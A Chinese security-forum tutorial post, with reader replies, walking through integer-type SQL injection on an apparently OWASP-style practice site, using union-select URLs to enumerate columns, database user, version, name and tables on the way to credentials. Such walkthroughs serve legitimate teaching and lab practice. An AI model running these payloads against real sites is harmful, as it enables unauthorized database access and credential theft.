首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]SQL注入获取用户名密码过程-integer型注入
发表于: 2019-8-7 15:47 7099

[原创]SQL注入获取用户名密码过程-integer型注入

CCMts 活跃值
2019-8-7 15:47
7099

这个也是OWASP放出来的一个web安全学习平台,PHP+MySQL,主要有SQL注入练习及简单绕过

地址:http://43.247.91.228:83/

1、找测试注入点

http://43.247.91.228:83/content-1/index.php?id=0

2、测试加 ' 号,页面返回错误(可能存在注入点)

3、确认是否存在注入点

http://43.247.91.228:83/content-1/index.php?id=0 and 1=1 页面返回正常

http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 页面返回错误

证明存在注入点

4、查询当前表有多少列,用order by测试,切换数字,直到不出错为止,测试结果为

http://43.247.91.228:83/content-1/index.php?id=0  order by 8

5、测试哪列数据有回显(1,2,3列都可以显示)

http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,2,3,4,5,6,7,8

5、查询数据库相关信息

查询当前用户权限 http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,user(),3,4,5,6,7,8

查询当前数据库版本 http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,version(),3,4,5,6,7,8

注:这里根据数据库版本可以选择应对策略

查询当前数据库名称  http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,database(),3,4,5,6,7,8

6、查询inject数据库里的表名(将表名'inject'进行ANSI编码结果为%27%69%6E%6A%65%63%74%27)测试结果表名为users


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2019-8-7 15:51 被CCMts编辑 ,原因: 补充说明
收藏
免费 0
支持
分享
最新回复 (11)
JaySe
雪    币: 1107
活跃值: (508)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
不错不错 很详细  
2019-8-7 16:47
0
niuzuoquan
雪    币: 300
活跃值: (2422)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
mark
2019-8-8 14:18
0
mb_pqzbeuna
雪    币: 219
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
4
大佬,我想学渗透,可以带带我吗?
2019-8-13 17:03
0
MDJerry
雪    币: 219
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
5
2019-8-16 21:22
0
nqxcwl
雪    币: 3935
活跃值: (187)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
sqlmap 直接搞起来~~
2019-8-16 21:33
0
Krypt0n
雪    币: 122
活跃值: (360)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
写的很仔细 
2019-8-21 19:06
0
coolsnake
雪    币: 2359
活跃值: (288)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
非常好的文章
2019-8-24 09:16
0
wasdzjh
雪    币: 1634
活跃值: (480)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
不错的文章,支持一下
2020-10-12 12:58
0
niuzuoquan
雪    币: 300
活跃值: (2422)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
mark,感谢分享
2020-10-12 14:26
0
goldli
雪    币: 2081
活跃值: (1716)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
12
先==,
select * from user where idusers=0 and 1=2 union select 1,2,3,4,5,6,7,8
你这里的   0 and 1=2 union select 1,2,3,4,5,6,7,8  为什么会存在 ?
这个是怎么输入进去的 ?
原始的sql是什么样的?

正常情况下,sql语句,查询人员使用登陆名
select Id,LoginPwd, LoginSalt from tb_user where loginName = @loginName
变量 @loginName = 前端传入值
什么时候允许使用 Id 进行传入的 ? 这么敏感的东西不是不允许使用的吗 ?
即使使用了, 那么也该是一个字符串 ,即
select * from user where idusers=“0 and 1=2 union select 1,2,3,4,5,6,7,8”
而不存 select * from user where idusers=0 and 1=2 union select 1,2,3,4,5,6,7,8。
如果能存在, 那么, 你不是直接可以访问数据库了 ?
2022-9-5 09:43
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//